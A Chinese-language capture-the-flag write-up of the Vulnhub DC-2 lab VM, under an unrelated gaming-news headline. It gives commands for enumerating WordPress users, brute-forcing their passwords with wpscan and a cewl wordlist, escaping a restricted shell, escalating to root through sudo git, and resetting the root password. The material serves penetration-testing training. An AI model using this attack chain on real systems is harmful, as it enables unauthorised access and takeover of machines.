1. 程式人生 > 遊戲 >傳索尼買下了Konami一個“非常流行的IP”

傳索尼買下了Konami一個“非常流行的IP”

Vulnhub靶機實戰——DC-2

描述:靶機DC-2共有5個flag,最終需要root許可權才可以找到並檢視flag

環境:Vmware虛擬機器軟體

DC-1靶機IP地址:192.168.1.146

kali的IP地址:192.168.1.148

1.檢視ip

nmap -sP 192.168.1.0/24    檢視ip
nmap -A 192.168.1.146     #這裡我的靶機IP是146

 

 

2.瀏覽器訪問http://192.168.220.146,發現無法正常訪問頁面,但在url位址列會有http://dc-2域名提示,發現問題是本地無法解析域名dc-2

 

 

3.編輯/etc/hosts檔案,新增靶機IP地址及對應域名:192.168.220.146 dc-2

vim /etc/hosts
192.168.1.146 dc-2

 

 

4.新增域名解析後,可以正常訪問網頁資訊,並能在Flag頁面找到flag1

提示使用cewl密碼字典生成工具,並且在登入後可以找到下一個flag

 

 

 

 

5.flag1提示可以登入,但正常訪問網頁無法找到登入頁面,所以使用nikto工具掃描網站結構,找到wp-login.php登入頁面

nikto -h dc-2 -o nikto-dc2.txt
cat dc-2.nikto

 

 

 

 

6.訪問登入頁面:http://dc-2/wp-login.php

 

 

7.使用wpscan工具掃描網站,獲取可以登入網站的使用者名稱,掃描後可以找到三個使用者名稱:admin、tom、jerry

wpscan --url dc-2 -e u

 

 

 

 

8.將掃描到的三個使用者名稱新增到dc-2users.list

vim dc-2users.list
admin
tom
jerry

 

 

 

 

9.使用flag1中提示的工具cewl生成密碼字典dc-2.dic

cewl dc-2 -w dc-2.dic
cat dc-2.dic

 

 

10.使用wpscan工具爆破可以登入使用者的密碼,可成功爆破tom和jerry使用者,密碼為:

jerry / adipiscing

tom / parturient

wpscan --url dc-2 -U dc-2users.list -P dc-2.dic

 

 

 

 

11.用ssh對其中一個進行連線,輸入密碼

ssh [email protected] -p 7744

 

 

 

BASH_CMDS[a]=/bin/sh;a  #呼叫/bin/sh命令直譯器
export PATH=$PATH:/bin/ #使用bash命令直譯器
export PATH=$PATH:/usr/bin #設定環境變數

 

 

找到flag3

切換到Jerry使用者找到flag4

 

 

flag4 提示我們可以使用git,我們可以通過git來提權


sudo -l #檢視可以使用root許可權無密碼的命令,有git命令
sudo git -p help #提權

 

 

然後彈出一堆東西最後是個冒號,我們在冒號後面輸入

! /bin/bash

 

 

然後就到了root使用者再輸入id ,whoami檢視自己的成果!

 

 

whoami   #檢視當前使用者
passwd root #修改root密碼
123456 #密碼修改為:123456
su root #切換到root使用者
cd /root #進入到root家目錄下
ls #找到final-flag.txt

 

 

找到5個flag檔案,並提權成功!